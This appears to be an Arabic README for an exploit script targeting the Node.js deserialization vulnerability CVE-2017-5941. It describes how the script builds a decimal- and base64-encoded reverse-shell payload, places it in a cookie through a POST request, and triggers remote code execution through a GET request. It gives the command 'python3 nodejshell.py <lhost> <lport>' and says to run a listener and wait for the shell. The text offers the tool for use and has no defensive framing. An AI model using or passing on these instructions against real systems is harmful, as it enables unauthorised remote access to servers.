
استغلال ثغرة ريفيرس شيل لفك تسلسل البيانات في NodeJs (CVE-2017-5941)
يقوم الاستغلال بتوليد حمولة الصدفة العكسية تلقائيًا، حيث يتم ترميزها بالنظام العشري ثم بـ base64. بعد ذلك، يتم إرسال هذه الحمولة عبر طلب HTTP POST يقوم بتسلسل إدخال المستخدم وتخزينه في كوكي. ومن ثم نحصل على تنفيذ الأوامر عن بُعد (RCE) عبر الوصول من خلال طلب GET.
طريقة الاستخدام:
python3 nodejshell.py <lhost> <lport>
lhost: عنوان IP المحلي الخاص بك lport: المنفذ الذي تريد الاتصال من خلاله بصدفتك العكسية
بعد ذلك، تحتاج فقط إلى توفير بعض المعلومات البسيطة:
بعد القيام بذلك، فقط قم بتشغيل listener المفضل لديك وانتظر استلام الاتصال.
